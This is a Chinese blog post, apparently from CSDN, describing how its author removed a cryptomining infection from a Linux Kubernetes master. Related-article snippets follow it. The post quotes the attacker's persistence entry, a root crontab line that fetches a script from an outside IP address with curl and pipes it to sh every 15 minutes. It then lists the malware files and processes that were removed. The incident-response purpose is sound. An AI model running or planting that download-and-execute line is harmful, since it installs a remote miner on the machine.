linux被病毒感染 CPU使用很高

最新推荐文章于 2022-09-29 17:30:27 发布
最新推荐文章于 2022-09-29 17:30:27 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: linux系统文章 文章标签: 挖矿 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40914968/article/details/89382559
版权

被当矿机。。挖矿 

这个机器运行着k8s master 跑着几十个应用和DB 不能重装

crontab -e  查到

dd掉这段 删除

后续处理:

删除/var/spool/cron/crontab/root,/var/spool/cron/root文件中 echo "*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root

删除/tmp/6Tx3Wq,/tmp/disable,/usr/bin/lrnbbce

kill掉进程:6Tx3Wq,lrnbbce

此时挖矿程序已经清理,后续可以删除被增加的hosts等文件

 

Aaron-chencl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 中毒 挖矿病毒,占用大量cpu,杀毒过程
lg4546的专栏
07-19 642
linux 挖矿病毒 , cpu 占用比较大 lVlgd 进程 , crontab 定时执行
病毒】【CPU使用率为100%】Linux 被 kdevtmpfsi 挖矿病毒入侵
走在搬砖的路上!
11-17 1139
重新安装redis(千万不要赋予root权限)服务,根据客户实际需要对特定IP开放端口(利用防火墙设置,尤其是必须对外(公网)提供服务的情况下),如果只是本机使用,绑定127.0.0.1:6379 ,增加认证口令。最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为100%,第一次删除干净了kdevtmpfsi程序,没曾想几分钟以后,就出现了第二个警告。crontab -r 表示删除用户的定时任务,当执行此命令后,所有用户下面的定时任务会被删除。
Linux CPU占用率99%很被kdevtmpfsi 和kinsing 挖矿病毒入侵
小蜜蜂
02-23 3527
目录 一:警告 二:查看cup占用 三:解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4:删除掉kdevtmpfsi的相关文件 四.怎么预防处理这个病毒 一:警告 先上阿里云上的报警信息。有个最大的问题是:top命令查看自己服务器CPU运行情况,会发现kdevtmpfsi的进程,CPU使用率为...
linux 进程 cpu 100,清理linux中占用CPU 100%的病毒
weixin_33014989的博客
05-10 274
病毒名随机,自启动并相互保护。快速清理流程假设的名字是wobprwmnqhzbve,如果top看不到,可以在/etc/init.d目录下面查看1、首先锁定三个目录,不能让新文件产生禁止该文件执行chmod 000 /usr/bin/wobprwmnqhzbve锁定chattr +i /usr/binchattr +i /binchattr +i /tmp2、锁定crontab文件,不让任何进程写入...
Linux服务器CPU100%问题(云服务器中了挖矿病毒
小小本科生
07-24 2804
今天玩云服务器,发现服务器变得很卡顿,解压文件有时都卡死了,很奇怪,不知道服务器出了什么状况。 于是登录到阿里云查看云服务器的情况,结果发现服务器CPU使用率一直维持在100%。 于是远程连接到服务器,进行问题排查 1、查消耗cpu的进程PID,输入top命令 2、根据PID查出消耗cpu的线程号。top -Hp 512,显示一个进程的线程运行信息列表。 3、把上面线程的十进制数转成十六进制(printf %x 1062) 为426 4、根据线程号查出对应的java线程,进行处理。jstac
腾讯云Linux服务器中毒, sshd恶意进程导致CPU占用100%
刘献强的专栏
06-15 5210
top 命令, 发现有sshd恶意程序运行, 导致CPU占用100% 2.3 加强防火墙 控制访问该linux的来源IP, 因为是开发用的机器, 只要配置公司和家里的外网出口IP即可. 头痛, 做完 2.1, 2.2, 2.3 后, 恶意程序过一段时间后, 还是会重新下载到/var/tmp目录, 并运行. 最终, 无意中, 发现有恶意的linux定时任务存在, 删除即可!......
linux中运到-bash 木马,占用cpu 飙到200%,导致服务卡
ouyang_x的博客
09-29 1825
linux -bash 挖矿木马
Linux 服务器中提CPU使用率脚本
08-11
每天18点启动一次,执行/etc/press/press_v3.1.sh文件,"-c=31":设置cpu使用率为31-36之间,“-t=86400”:执行86400秒=24小时 echo '30 15 * * * /bin/bash /etc/press/press_v3.1.sh -c=31 -t=86400' >> /etc/...
详解Linux CPU负载CPU使用
09-14
Linux系统中,CPU负载CPU使用率是评估系统性能的两个重要指标,它们可以帮助我们了解系统的繁忙程度和资源利用状况。本文将深入探讨这两个概念及其关系。 **CPU使用率**指的是CPU在一段时间内用于执行任务的...
linux服务器找到占用cpu的java代码的办法
06-10
Linux服务器环境中,Java应用程序可能由于各种原因导致CPU使用率过,这可能会影响系统的整体性能。要找到占用CPU的Java代码,我们可以采取一系列步骤来诊断和优化问题。以下是一种详细的方法: 1. **查看系统...
linux 排查cpu负载异常.docx
08-19
接下来,我们需要进一步查找该进程中哪个线程导致了CPU使用使用`top -Hp 10765`,这个命令会显示进程10765的所有线程及其CPU使用情况。再次按`P`键,线程将按照CPU使用率排序。假设我们发现线程PID为10804是...
linux服务器CPU中毒排查
HouYing
11-30 1537
通过top查看到了,占用CPU进程,记录下进程号 cd/proc/进程号 ls -la 查看到exe后边对应的命令为:usr/bin/-bash (deleted) 在每小时的脚本中找到了sync,然后通过这个找到了病毒所在目录:/bin/sysdrr 病毒清理脚本如下: chattr -R -i /bin/sysdrr chattr -R -i /etc/cron.d/0hourly chattr -R -i /etc/cron.daily/sync chattr -R -i /.
成功处理挖矿病毒劫持,crontab注入顽固脚本,cpu、内存飙升
yan_dk的专栏
08-30 2124
本人的linux centos服务器挖矿病毒劫持有几个月了,crontab 顽固脚本一直占用,删除也删除不了,cpu、内存一直被长期占用,真是非常痛苦。最近花了几天时间研究,终于成功处理了。cpu、内存也平稳运行了,心情轻松了很多。 有需要技术支持解决问题的朋友,可以联系我。 手机:18034263356 ...
服务器病毒,侵占CPU资源
Climber4211的博客
08-20 1216
以下是我从服务器中的病毒里找到的一个文件,从中学到不少知识,现在将这个病毒分析一下,本人只是一个开发,服务器被这个病毒侵占CPU挖矿,没办法,只能研究这个病毒,看怎么让我的服务器访问速度快点。 具体的讲解我也是看到了别人的文章,挂出来 第一篇文章 第二篇感觉讲的很详细 这个病毒最主要的表现是CPU 被占用,自己的服务打开速度奇慢,甚至打不开 #!/bin/bash SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin setenforce 0 2>/d
应用服务器cpu问题排查
weixin_39726863的博客
11-11 1890
作为性能测试工程师,在日常工作中我们会遇到 Linux服务器上出现CPU负载达到100%居不下的情况,如果CPU 持续跑,则会影响业务系统的正常运行。 Linux 系统 CPU 占用率较问题排查思路 很多性能的同学遇到这种状况往往会不知所措,对于CPU过载问题通常使用以下两种方式即可快速定位: 方法一 第一步:使用 top命令,然后按shift+p按照CPU排序 找到占用CPU的进程的pid 第二步:使用 top -H -p [进程id] 找到进程中消耗资源***的线程的id 第三步:使用 ech
进程占用CPU 100%时可能中的病毒
不用此栏
04-14 3536
进程占用CPU 100%时可能中的病毒   system Idle Process   进程文件: [system process] or [system process]   进程名称: Windows内存处理系统进程   描 述: Windows页面内存管理进程,拥有0级优先。   介 绍:该进程作为单线程运
linux操作系统cpu使用解决办法
最新发布
09-08
Linux操作系统的CPU使用时,可以采取以下解决办法: 1. 使用系统监控工具:使用工具如top或htop等来查看系统进程中CPU利用率最的进程。这可以帮助我们确定导致CPU使用的原因,并且可以进一步采取适当的措施进行解决。 2. 杀死CPU利用率的进程:通过终止或重启造成CPU利用率的进程来降低系统的负载。可以使用命令如kill或pkill来停止指定的进程。 3. 优化系统配置:通过优化应用程序或系统配置来减少CPU压力。例如,增加系统内存、调整系统参数或减少并发连接等。 4. 检查恶意软件:进行系统病毒扫描,以确保系统没有受到恶意软件或病毒的感染。恶意软件可能会导致CPU使用。 5. 更新软件包:升级或更新软件包可以修复性能问题并提供更好的优化。通过使用系统包管理器如yum或apt-get等来更新和升级软件包。 6. 启用系统定时任务: 手动清理系统日志和临时文件可能会很麻烦,可以通过设置自动任务定期清理来优化系统性能。 7. 检查硬件问题:有时CPU使用可能是由于硬件问题引起的。确保CPU风扇运行正常,散热良好,所有硬件组件正确插入,并消除硬件故障。 8. 监控系统性能:通过使用工具如sar、vmstat等来对系统资源使用情况进行监控,以便及时发现CPU使用的问题,及时采取相应的解决措施。 总结起来,解决Linux操作系统CPU使用的问题,需要综合考虑软件配置和硬件情况,通过优化系统配置、优化应用程序、杀死CPU利用率的进程、更新软件包等多种手段来降低系统负载和提升性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值